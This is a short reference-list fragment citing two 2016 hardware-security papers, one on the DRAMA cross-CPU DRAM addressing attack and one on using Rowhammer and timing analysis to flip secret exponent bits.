[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf